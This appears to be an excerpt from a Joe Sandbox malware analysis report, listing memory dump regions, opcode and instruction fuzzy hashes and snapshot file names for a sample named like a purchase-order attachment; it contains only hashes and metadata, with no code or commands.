                                              • Opcode ID: f60977ace6619d410a3104c6a303ec17443c5df35a3193862dae31156d0f1cba
                                              • Instruction ID: e2712fdb8c826ca67fe02efb93d99df7acee6110475fc3db484bb7dfcba4d0d4
                                              • Opcode Fuzzy Hash: f60977ace6619d410a3104c6a303ec17443c5df35a3193862dae31156d0f1cba
                                              • Instruction Fuzzy Hash: 5EE08C34948308DBCB08DF94E840A6CFFB8AB86300F2080EC8C1867340CB325E42DBC0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0382d1189dbffff69f9fa8850e42a63de89b9f188a678f76544cae9038c65aa5
                                              • Instruction ID: ea4ab69d9b0c1af024c5428398d5356893673a616ed390acde904cf6e9f6a0ca
                                              • Opcode Fuzzy Hash: 0382d1189dbffff69f9fa8850e42a63de89b9f188a678f76544cae9038c65aa5
                                              • Instruction Fuzzy Hash: 38F062B4D42228DFCBA4DF55E88869CBBB5FB58311F1082D9940DA3354DB345E90CF40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e3acd6a87e9b093aa52a111c6fa69d4c87066b0a9eed46149705915eab726204
                                              • Instruction ID: 28f9eeb79359cb875844fa0ddea612b631b6626e3e3c4056941124785b62da44
                                              • Opcode Fuzzy Hash: e3acd6a87e9b093aa52a111c6fa69d4c87066b0a9eed46149705915eab726204
                                              • Instruction Fuzzy Hash: B9D01730C4930CEBCB19EFA5A5086ADBBBAEB42302F6045ECC80437650DA719E94DF95
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4f83c5391f89bb556e4406f86636acb835b68d645998f1442378e74ecee788e5
                                              • Instruction ID: bcb89f52b988e2e28e1e9e4eb802df25dc992c7ec578f3238ba10f394f739eb9
                                              • Opcode Fuzzy Hash: 4f83c5391f89bb556e4406f86636acb835b68d645998f1442378e74ecee788e5
                                              • Instruction Fuzzy Hash: CCE01274E0020CEBDB04EFB5E951BADB7B6EB84600F5085A9D805D7240FE716E019B91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 84b948a0939af040a92e8819c784242760080a5dca911754727dc6adec7631ae
                                              • Instruction ID: 5c79c8341e87817c4d5dd8c83d8ffbd2ac2f8bba59c6cdd6230e1964ec30dd7b
                                              • Opcode Fuzzy Hash: 84b948a0939af040a92e8819c784242760080a5dca911754727dc6adec7631ae
                                              • Instruction Fuzzy Hash: E4D0A73098D208DFC704DB95D840A69F7BCDB46214F2090DCCC0867751CB729E01CB81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 00e55752eb1082bbe1122558f4c7ccbff2f16d7904b1e0d4290aeffce8f73d10
                                              • Instruction ID: 5bbf253e8cc075edc20356af55f0b58f420cf3d0fc6ce7a9fd677c99eeb6742d
                                              • Opcode Fuzzy Hash: 00e55752eb1082bbe1122558f4c7ccbff2f16d7904b1e0d4290aeffce8f73d10
                                              • Instruction Fuzzy Hash: A7D022FBE10001AFCF10EAA249E9D88AF10EA222313228ACAE016C90C1CC21A103C362
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e5b0da92d35ce3450a598e7f9bd8882fd6a60e7eb55dbaf2ba3c2f866b379bb
                                              • Instruction ID: 2823ecb0a2d27f3b8f197958c12e8238657f9b5d166bbee0eef6658c94978f27
                                              • Opcode Fuzzy Hash: 8e5b0da92d35ce3450a598e7f9bd8882fd6a60e7eb55dbaf2ba3c2f866b379bb
                                              • Instruction Fuzzy Hash: 5AE01270A1020DEFCB04EFF8E541A9D77F5EB44310F1045A9D409D3304EA716E009B91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486411765.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e70000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1a1c093a444b4f4e426627a5faf3976f24f4caad985b5e3a33d444f657a9b298
                                              • Instruction ID: b16f48eabd28c20407b9e0af5a3cd2febbd9d9bab02659a3dbb1875cb91c1c62
                                              • Opcode Fuzzy Hash: 1a1c093a444b4f4e426627a5faf3976f24f4caad985b5e3a33d444f657a9b298
                                              • Instruction Fuzzy Hash: 8AD0A93088B30CDBE718DBA69408BAEB36DEB02215F2020EC880922210DBB29D40CFC0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d41020bd565b59c1be7243783253bc1c4ba3775ced3ff0c8603c6ec6766395f
                                              • Instruction ID: 3c102826bf184470d60b915d62f4a9d2e3f9eed7707ab601d5ceab0f03ed546f
                                              • Opcode Fuzzy Hash: 1d41020bd565b59c1be7243783253bc1c4ba3775ced3ff0c8603c6ec6766395f
                                              • Instruction Fuzzy Hash: D7C08C22C8B305CBE3981282B408338F2AC8B07202F0128824A2C61862C7B058A1CB89
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f76198f64ad32ddff98fac3c4a6fe372ea848968dde349888a3dd2d70cc2a5ca
                                              • Instruction ID: 1576e71304db8580807175eab8df4d5de8a9bd96ef5e4c9fd83cd10ad8081f00
                                              • Opcode Fuzzy Hash: f76198f64ad32ddff98fac3c4a6fe372ea848968dde349888a3dd2d70cc2a5ca
                                              • Instruction Fuzzy Hash: DFC08C319913048FD31BBBE6B80C738B76C9B0621BF001864D00C208208BB92CB0CB7A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 63d7e54af3f4f0de9d4f4afbda0ce22148a58beb12dfa0083c76debe8afa1e6d
                                              • Instruction ID: 83a0eb7bdbf9d89af5ad20055b80567fbb1e8e4757498c145f776ac1ae4e326f
                                              • Opcode Fuzzy Hash: 63d7e54af3f4f0de9d4f4afbda0ce22148a58beb12dfa0083c76debe8afa1e6d
                                              • Instruction Fuzzy Hash: 9FD0A738E81320CBC704AF10D8086193770EB04301F960455C847A3611D338D8429682
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 120c9d4d561f8bf8de4ff3fdeb29bf229c1a4eff5c1a8148654e85d2bd61a360
                                              • Instruction ID: f150c104727989d97a1a3f63fc6e40e754c33d813570e73104a1c9f09b1ab1bf
                                              • Opcode Fuzzy Hash: 120c9d4d561f8bf8de4ff3fdeb29bf229c1a4eff5c1a8148654e85d2bd61a360
                                              • Instruction Fuzzy Hash: 2AD022302020148FE314EFC0C806BABB3B6EB8C305F108088D41993788CF398D808F91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4a65c1e339d7cd87fc3e6b6decbeada3821f76c56d77cffe61121b1137e37d9b
                                              • Instruction ID: 1952a0e03c6149118aecffd7252486e43cc41fc8137ca8643bb212301b2dbd43
                                              • Opcode Fuzzy Hash: 4a65c1e339d7cd87fc3e6b6decbeada3821f76c56d77cffe61121b1137e37d9b
                                              • Instruction Fuzzy Hash: 18C04C76E1001E9BCF04DBD9E9418DCFBB4EF94322F404036D214A7104D6301526CF54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5e15d4f9646479418277e76b00d37bb3877058eb7f44e93009c5842effa9ce78
                                              • Instruction ID: 30463efcbde2b3e4fb891db62ca3b7b75a3d359c61746c3739a3b6782e92e3cd
                                              • Opcode Fuzzy Hash: 5e15d4f9646479418277e76b00d37bb3877058eb7f44e93009c5842effa9ce78
                                              • Instruction Fuzzy Hash: A0B012C2CB41E049F5020C74093857229109A33C22BC807931C46D71C2E00C840C0065
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
                                              • Instruction ID: 2ad57114494cc740969b95bee8f444b209d5990da35e5c480c7824bf6c3857fe
                                              • Opcode Fuzzy Hash: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
                                              • Instruction Fuzzy Hash: B7C09276140208EFC700DF69E844C45BBB8FF1976071180A1FA088B332C732E820DA94
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                              • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                              • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                              • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1bb7c0f02f7ffa74d8f1471a279980e15567abe3f29a73910f9cd318726fbefb
                                              • Instruction ID: 8d4b795176ec3f2719ddaebc158fc961b1f276fc2d66b6cfc18c294cfbc0aa93
                                              • Opcode Fuzzy Hash: 1bb7c0f02f7ffa74d8f1471a279980e15567abe3f29a73910f9cd318726fbefb
                                              • Instruction Fuzzy Hash: 27B092AADA82506FDA117BA0B85A65C3E82EA51320B1A1BC4E0B6431E2DD54506AE952
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 39e37e9c0425f7421bf3d23f0bb4007272027cd616ea63f2e0544bad3d4cb721
                                              • Instruction ID: 71a549f5414a4ab93cad0e485272271ae53cadfbadee8fa1188292fcbe18944f
                                              • Opcode Fuzzy Hash: 39e37e9c0425f7421bf3d23f0bb4007272027cd616ea63f2e0544bad3d4cb721
                                              • Instruction Fuzzy Hash: 51A0023E614AC960DE697591CE07FB84C47EB55705FF40CDDE360A03608528B904906D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45cc470b57cea643f430807d06775f70910ad76ab966fcc92a8d76cbd6aceabe
                                              • Instruction ID: 7c1ba87b3aeb8bab4761708e78b56ab1a4bb31f4f951e61e4946b5c62b7884a2
                                              • Opcode Fuzzy Hash: 45cc470b57cea643f430807d06775f70910ad76ab966fcc92a8d76cbd6aceabe
                                              • Instruction Fuzzy Hash: 18900231485B5C8F4B406795740D559B75CA544525BD41451F50E415015A5974604596
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dde2fbf3ffbeed5baa748adec03c214cc03a813c971e2d1d622ce91f57595fb9
                                              • Instruction ID: bc11a5b72233871eca517763db5a6d39185a1b4891ce8cbb1469ff8abffea248
                                              • Opcode Fuzzy Hash: dde2fbf3ffbeed5baa748adec03c214cc03a813c971e2d1d622ce91f57595fb9
                                              • Instruction Fuzzy Hash: 8CA002345A40289BCF10BF50ED5A5953B61F6427817705450B04A8B018DA619C5EDF84
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: >$J
                                              • API String ID: 0-3059046560
                                              • Opcode ID: b4f351d421f34ec9026231e5dce398cdd89d5ce2d47d712769734140ae9d32ff
                                              • Instruction ID: d6d2d87e4d824211a5e7fe65e8ef3ae42452266d34d4e77bb10ea123e9e5cbe6
                                              • Opcode Fuzzy Hash: b4f351d421f34ec9026231e5dce398cdd89d5ce2d47d712769734140ae9d32ff
                                              • Instruction Fuzzy Hash: 0B41AA71E056598BEB58CF2BC94869EFAF7AFC9301F18C5EAC40DA6254DB300A81CF41
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 221fe3c271c098e2584c7efe72f28d0fd9d78e710c2371a72978f9849828a73c
                                              • Instruction ID: 3e436cf4bbf5a26eb3c736d0b4747ac159579aaf7c93d66a3a1f9f54ee70207a
                                              • Opcode Fuzzy Hash: 221fe3c271c098e2584c7efe72f28d0fd9d78e710c2371a72978f9849828a73c
                                              • Instruction Fuzzy Hash: F9327AB4B006158FDB18DF69C499B6EFBF2FB88300F248929D49AD7350DB34A945CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 537c2779e466c296b5febe69b2b687fbe2c5bc7fa5e3008fa158018cb71e3c39
                                              • Instruction ID: 3db3f9d36464aa66ffa028f7a3c94337a2c2d409e8b5161ba09a97232f56939d
                                              • Opcode Fuzzy Hash: 537c2779e466c296b5febe69b2b687fbe2c5bc7fa5e3008fa158018cb71e3c39
                                              • Instruction Fuzzy Hash: A8D10A34A006048FDB18DF69C5D4EA9BBF2BF88712F66C899E4159B361DB35EC81CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7093ae48a2746205b06e1afe167d63bbb3dcd83ce12a77db2cfca5c2103c3e9
                                              • Instruction ID: 63450972188879f5db2bcda2b4452cecbcae00cba8a9a12f0fb02df4057758db
                                              • Opcode Fuzzy Hash: c7093ae48a2746205b06e1afe167d63bbb3dcd83ce12a77db2cfca5c2103c3e9
                                              • Instruction Fuzzy Hash: 2FE1C270E042588FDB14CFA9C984A9DFBF2FF88304F24C559D459AB24AD734A986CF94
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486411765.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e70000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f7abae1d5539f6c0144cd59d889e113cbcdb594284768093844a988dfb97e126
                                              • Instruction ID: e8c41c4af7f36e822cc52f536fd7f2047111573698ce9aa6b05e6efa0ed02e9d
                                              • Opcode Fuzzy Hash: f7abae1d5539f6c0144cd59d889e113cbcdb594284768093844a988dfb97e126
                                              • Instruction Fuzzy Hash: 4BB12774E04218CFDB14DFA5D488BEDBBB2FB49304F10A1A9D489A7356EB746989CF04
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486411765.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e70000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2b9229fb0833f52b14dc4305dba5b35c12bf66dad9b284034bd0b7ccc822daef
                                              • Instruction ID: 42d7d94720f3ebe17d3c3400abf3db2bff845e69e48d39254114434db0120732
                                              • Opcode Fuzzy Hash: 2b9229fb0833f52b14dc4305dba5b35c12bf66dad9b284034bd0b7ccc822daef
                                              • Instruction Fuzzy Hash: ABB13874E04208CFDB14DFA5D488BEDBBB2FB49304F10A169D08AA7356EB746989CF04
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a1f11ed563a213c95c5fd78eb5eefbdf703d3615471e226437e9b4712a9b9db7
                                              • Instruction ID: f5a1828d136060d407beb55e7f298a9cf60dbb600b9c682204b4a69a0a55106e
                                              • Opcode Fuzzy Hash: a1f11ed563a213c95c5fd78eb5eefbdf703d3615471e226437e9b4712a9b9db7
                                              • Instruction Fuzzy Hash: 0061BCEB4815826BCF1D8534DCEF7A52BF0E762A1C3DDAE888493CA355D22CC917C641
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0834bcf95df8a3ee9b7e6d1d4c8ccc1772f30b9d38c54dc57648f8f9c189b265
                                              • Instruction ID: 997e4838e540b2d7f1b621f89dd6574af31f0e5992c75ae6bc5ff3e03e3782f9
                                              • Opcode Fuzzy Hash: 0834bcf95df8a3ee9b7e6d1d4c8ccc1772f30b9d38c54dc57648f8f9c189b265
                                              • Instruction Fuzzy Hash: 33A1E674D05218DFDB14CFAAD848BADBBF2BB89304F1094A9D409BB355EB705985CF44
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 24058bd91d29fe4e5b88c65a592a019e6b4e0ff26c680ab093059891cd3c38c4
                                              • Instruction ID: 402ea5bf510c2c13972d423a43d0db51f8b676df11b993b7572f74e69e2f3615
                                              • Opcode Fuzzy Hash: 24058bd91d29fe4e5b88c65a592a019e6b4e0ff26c680ab093059891cd3c38c4
                                              • Instruction Fuzzy Hash: BDA1E474E05218DFEB14CFAAD848BADBBF2BB89304F1094A9D409B7355EB705989CF44
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8f472a6d8c525b875242ef946c3f96d73cb8666f45dfc4d7956ed8ad2d9ef0b0
                                              • Instruction ID: 0a8432e131b5fdb912304922fe985a59e0533c1edf66156eedc57d2fa82a045c
                                              • Opcode Fuzzy Hash: 8f472a6d8c525b875242ef946c3f96d73cb8666f45dfc4d7956ed8ad2d9ef0b0
                                              • Instruction Fuzzy Hash: E0811270D04218DFDB14DFA9D889BEDBBB2FF89304F50A0A9D449A7258EB345989CF10
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed46ac48a6b905fc6d6974bb3413bac5c19b73fd87ed174fc0d8b211d8fee28b
                                              • Instruction ID: a3000c8dc58cbac7bf62d17d5e843082d00a567c3fb3b84dcd2544da53828089
                                              • Opcode Fuzzy Hash: ed46ac48a6b905fc6d6974bb3413bac5c19b73fd87ed174fc0d8b211d8fee28b
                                              • Instruction Fuzzy Hash: 44810174D04218DFDB14DFA9D888BEDBBB2FB89304F50A1A9D449A7258EB345989CF10
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 52edd9a792c532ca555dcb4c48306db85bc84c246d10510bb821cc4402d085c2
                                              • Instruction ID: 3704ce15f9a3241fb77858c0eb4ee74cae42279bb2f22341eaad9fdfd9f09b25
                                              • Opcode Fuzzy Hash: 52edd9a792c532ca555dcb4c48306db85bc84c246d10510bb821cc4402d085c2
                                              • Instruction Fuzzy Hash: 1A710A70E007598FE749EF7AE84069EBBF3BBC9300F14D569C0059B368EB7058968B95
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0805056b4f71e99a2d1dc0b39550b5f557b935707202417ca3aadb2c21a4ef20
                                              • Instruction ID: dfb9da43a40a81ae7ba23e8f2ddb7b2c5549ac2e0d3180b1ac86ec1a29e4db02
                                              • Opcode Fuzzy Hash: 0805056b4f71e99a2d1dc0b39550b5f557b935707202417ca3aadb2c21a4ef20
                                              • Instruction Fuzzy Hash: 6261FB70E007598FE749EF6AE84069EBBF3BBC9300F14D569C0059B368EB7058568B95
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 557cae55efd23d32fccdb7064a02e92add250c8aef60b23e25fe185a36c536c1
                                              • Instruction ID: db20ca31a57ff6793e8df480ae11c077a3d68b582cd979976bc5be769a5a0d53
                                              • Opcode Fuzzy Hash: 557cae55efd23d32fccdb7064a02e92add250c8aef60b23e25fe185a36c536c1
                                              • Instruction Fuzzy Hash: 585107B0D09218DFDB04DFA9D4497EDBBF2FB89304F10A169E48AA7254E7745A85CF04
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486576798.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5ee0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1b1ccf72e288f24b72aadac86477e359d73c89165d47408e0aa5c521b66256d8
                                              • Instruction ID: cfe0de86512e2acbd086fb368e4d2bbbd9fb374295c4a8e40fd0859ffab44f3c
                                              • Opcode Fuzzy Hash: 1b1ccf72e288f24b72aadac86477e359d73c89165d47408e0aa5c521b66256d8
                                              • Instruction Fuzzy Hash: 06410FB0D10348DFEB10CFA9D985B9EBBF1BB09304F20A02AE855BB250D774A885CF45
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486576798.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5ee0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
